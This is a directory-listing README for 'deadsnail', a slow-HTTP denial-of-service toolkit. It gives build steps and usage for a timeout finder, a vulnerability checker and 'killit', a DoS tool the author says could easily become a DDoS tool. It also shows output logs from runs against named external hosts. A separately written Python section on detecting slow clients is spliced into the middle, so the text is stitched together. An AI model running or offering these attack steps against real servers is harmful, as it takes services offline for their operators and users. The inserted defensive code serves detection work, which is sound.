Index of /~cia/files/deadsnail

Name              Last modified      Size
deadsnail.tar.gz  25-Jun-2009 12:41  2.1M

this is a simple way to test whether a tcp service (in this case http) is
vulnerable to dead snail attacks.

a dead snail is just a dead snail. it doesn't move, but if you look at it long
enough you may get the impression that it's moving. picture yourself watching 1k
dead snails to see whether they move or not. you won't be able to do anything
else and, better than that, some of them will move ...

this can be applied in our case to an http service. throw a few K of dead snails
at it and let it watch them moving.


no_flames: you can't blame any tcp service for doing this. as i said on
isc.sans.org:
>>>>>>>
>anyway, this is not a bug, nor can i call it a flaw, it is just a friendly
>manner to serve the requests that can be exploited by the bad guy. i don't see
>anything wrong (ethically speaking) in resetting that timer the way it is
>(think congestions and the fact that there MAY be real slow clients) but ...
>one should be prepared to say "I'm sorry but i have to drop you" to the most
>lazy connection. care should be taken when computing laziness factor on big
>posts.

++++++++++++++++

i ran all this b.s. on a gentoo linux 2.6.29 amd64, gcc 432, libc 2.8.
with small modifications this animal could run on bsd platforms as well; one needs
to translate the corking and nodelay socket options.

just so you know, one way to test http service availability before, during and
after the attack:

echo -en "GET / HTTP/1.0\r\nHost: localhost\r\n\r\n" | nc -vvvvvvvvv localhost 80 | head -1

if your service is f... dead you'll have to hit ctrl+c:

localhost.localdomain [127.0.0.1] 80 (http) open
^C sent 35, rcvd 0

if not (before/after the attack) you will receive:

localhost.localdomain [127.0.0.1] 80 (http) open
 sent 35, rcvd 318
 HTTP/1.1 200 OK

to execute, do this:

1. in the source directory, run:
   diggit http://localhost >links.h 2>diggit.log

this will create a sitemap and generate links.h

diggit requires these perl modules:

HTML::LinkExtor;
HTML::Form;
LWP::UserAgent;
URI::URL;
Data::Dumper;

you can install those from cpan.
if you dig your localhost (as you should), make sure there are some links over
there to generate the site map from (make an alias to some /usr/share/doc/***
folder with html files).


2. compile:

ulimit -n 8192 (or not: if you have access to the service you test, go and
lower its resources instead of increasing the local ones. it's the same thing,
only better)

ATTENTION: you will need state threads from http://state-threads.sf.net
i compiled state threads with:
make EXTRA_CFLAGS="-DUSE_POLL -DFD_SETSIZE=8192 -DST_MIN_POLLFDS_SIZE=256" linux-debug

a successful state threads compilation will create a folder:
<build-root>/st-1.8/LINUX_<version>-<os_vendor>-r1_<compilation_type>
modify the ST_HOME variable in deadsnail's Makefile to point at that state threads build dir, and
export LD_LIBRARY_PATH with ST_HOME included in the shell you will run the
exploits from.


then:

make all

result: 3 executables: fingerit, snailit and killit

fingerit will guess the timeout set up on the target host
snailit will test whether the host is vulnerable without attacking it
killit will dos the host


++++++++++++++++++++++

running:
fingerit <hostname> <port>

example output:
cia@localhost ~/dev/deadsnail(fingering) $ ./fingerit server.com 80
resolving timeout on connection to server.com:80, this may take a while depending on remote server setup
wrote 3 bytes to net bufs, waiting on local buffers to flush ... buffers flushed to net!
waiting on remote timeout ...
error returned as expected,timeout=10 seconds, error_code=0, error_msg="Success"



that shows you the timeout set up on the server side.


+++++++++++++++++++++++


you will use that with snailit

usage:
./snailit <hostname> <port> <fingerit_observed_timeout>

example (hitting a vulnerable apache http service). note that the timeout i
set up on it is 10 seconds, yet i can keep a single request running for 1272
seconds (in fact i could run it indefinitely, but i ran out of bytes to
send):

cia@localhost ~/dev/deadsnail(fingering) $ ./snailit bofh.sysami.com 80 10
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698342,next_sleep_period=6s,running_since=0s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698348,next_sleep_period=6s,running_since=6s
prev_bytes_queued=0,bytes_sent=5,timestamp=1245698354,next_sleep_period=6s,running_since=12s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698360,next_sleep_period=6s,running_since=18s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698366,next_sleep_period=6s,running_since=24s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698372,next_sleep_period=6s,running_since=30s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245698378,next_sleep_period=6s,running_since=36s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698384,next_sleep_period=6s,running_since=42s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698390,next_sleep_period=6s,running_since=48s
....
...
....
....
prev_bytes_queued=0,bytes_sent=5,timestamp=1245699663,next_sleep_period=6s,running_since=1254s
prev_bytes_queued=0,bytes_sent=5,timestamp=1245699669,next_sleep_period=6s,running_since=1260s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245699675,next_sleep_period=6s,running_since=1266s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245699681,next_sleep_period=6s,running_since=1272s

if the request finishes (we send just one) then you'll also get the
response from the http server.



running snailit against a NOT vulnerable squid service (with timeout set to 30
seconds; it closes my connection without any doubt):
cia@localhost ~/dev/deadsnail(fingering) $ ./snailit liver.cdn-cache.twinbyte.com 80 30
prev_bytes_queued=0,bytes_sent=4,timestamp=1245699704,next_sleep_period=19s,running_since=1s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245699723,next_sleep_period=11s,running_since=20s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245699734,next_sleep_period=21s,running_since=31s
cia@localhost ~/dev/deadsnail(fingering) $
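the defender-side reading of the isc comment quoted above, checked against the snailit output shown for the vulnerable apache and the non-vulnerable squid: an added python example, not code from the deadsnail tarball. it models a server that (a) resets an idle timer on every received byte, which is the behaviour snailit relies on, and (b) judges each connection by its laziness factor (bytes received per second of lifetime) after a grace period, which is the rule the quote asks for. the grace period and minimum rate are assumed policy values, not from the page; the sample progress lines are copied from the output above.

```python
"""Slow-client ("dead snail") detection for a server's request-read path.

Added example, not part of the deadsnail tarball. Two server rules are modelled:
  * idle_timer_fires: an idle timer reset on every received byte. snailit sends
    a few bytes per sleep period, so no gap reaches the timeout and it never fires.
  * verdict: the "laziness factor" rule from the quoted ISC comment. After a grace
    period a connection is judged by its rate, and lazy ones are dropped. A big
    POST that keeps flowing has a high rate and survives (the "big posts" caveat).
The parser reads snailit's own progress lines so they can serve as input.
"""
import re
from dataclasses import dataclass

# Policy values are assumptions for the example, not taken from the page.
GRACE_SECONDS = 20        # do not judge a connection before it has had this long
MIN_BYTES_PER_SEC = 10.0  # any real client sends far more than this while talking


@dataclass
class Conn:
    """What a server needs to track per accepted connection."""
    opened_at: int     # unix time the connection was accepted
    last_seen: int     # unix time of the most recent received byte
    received: int = 0  # total request bytes received so far

    def feed(self, nbytes: int, now: int) -> None:
        self.received += nbytes
        self.last_seen = now

    def elapsed(self, now: int) -> int:
        return now - self.opened_at

    def rate(self, now: int) -> float:
        """Laziness factor: bytes per second over the connection's lifetime."""
        return self.received / max(self.elapsed(now), 1)


def verdict(conn: Conn, now: int) -> str:
    """Return 'keep' or 'drop' for one connection at time `now`."""
    if conn.elapsed(now) < GRACE_SECONDS:
        return "keep"  # too early to judge; genuinely slow clients get a fair start
    if conn.rate(now) < MIN_BYTES_PER_SEC:
        return "drop"  # the laziest connection is the one to say "sorry" to
    return "keep"


def idle_timer_fires(events, timeout: int) -> bool:
    """The rule snailit defeats: fires only if the gap between two received
    bytes reaches `timeout`, because every byte resets the timer."""
    times = [ts for ts, _ in events]
    return any(later - earlier >= timeout for earlier, later in zip(times, times[1:]))


LINE_RE = re.compile(
    r"prev_bytes_queued=(?P<queued>\d+),bytes_sent=(?P<sent>\d+),"
    r"timestamp=(?P<ts>\d+),next_sleep_period=(?P<sleep>\d+)s,"
    r"running_since=(?P<since>\d+)s"
)


def parse_snailit(text: str):
    """Turn snailit progress lines into (timestamp, bytes) events; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append((int(m["ts"]), int(m["sent"])))
    return events


def replay(text: str) -> dict:
    """Feed snailit's progress lines to the server-side model, as if they were the
    bytes the server received, and report the verdict at the last line."""
    events = parse_snailit(text)
    conn = Conn(opened_at=events[0][0], last_seen=events[0][0])
    for ts, nbytes in events:
        conn.feed(nbytes, ts)
    now = events[-1][0]
    return {"verdict": verdict(conn, now), "elapsed": conn.elapsed(now),
            "received": conn.received, "rate": round(conn.rate(now), 2)}


# The first nine progress lines of the vulnerable apache run shown above.
APACHE_SAMPLE = """
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698342,next_sleep_period=6s,running_since=0s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698348,next_sleep_period=6s,running_since=6s
prev_bytes_queued=0,bytes_sent=5,timestamp=1245698354,next_sleep_period=6s,running_since=12s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698360,next_sleep_period=6s,running_since=18s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698366,next_sleep_period=6s,running_since=24s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698372,next_sleep_period=6s,running_since=30s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245698378,next_sleep_period=6s,running_since=36s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698384,next_sleep_period=6s,running_since=42s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698390,next_sleep_period=6s,running_since=48s
"""

# The three progress lines of the squid run shown above.
SQUID_SAMPLE = """
prev_bytes_queued=0,bytes_sent=4,timestamp=1245699704,next_sleep_period=19s,running_since=1s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245699723,next_sleep_period=11s,running_since=20s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245699734,next_sleep_period=21s,running_since=31s
"""

if __name__ == "__main__":
    for name, sample, timeout in (("apache", APACHE_SAMPLE, 10), ("squid", SQUID_SAMPLE, 30)):
        print(name, replay(sample),
              "idle timer fires:", idle_timer_fires(parse_snailit(sample), timeout))
```

on the apache lines the 10 second per-byte-reset timer never fires because every gap is 6 seconds, which is exactly why one request can be kept open for 1272 seconds; the rate rule drops the same connection once the grace period is over, at roughly 0.6 bytes/s. on the squid lines no gap reaches 30 seconds either, yet the output above shows squid closing the connection after about 31 seconds, so squid is not using a per-byte-reset idle timer; the rate rule reproduces its outcome. a legitimate slow upload is unaffected because its rate stays far above the threshold.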




______________________________________________________________________
running killit:
killit is a light version of what killap was in 2007 - a ddos tool. now it's a
dos tool, but one may easily transform it.

usage: ./killit <host> <port> <remote_timeout> <snails_amount>
host and port ... well, it's the target info you used before
remote_timeout is the timeout from fingerit
snails_amount is the number of snails you want to throw into the wild

for example, i tested an apache with timeout set to 10 seconds, maxclients
512, etc. that would be:
./killit localhost 80 10 513 :)


====================================================================

this proves the timeout-reset bug.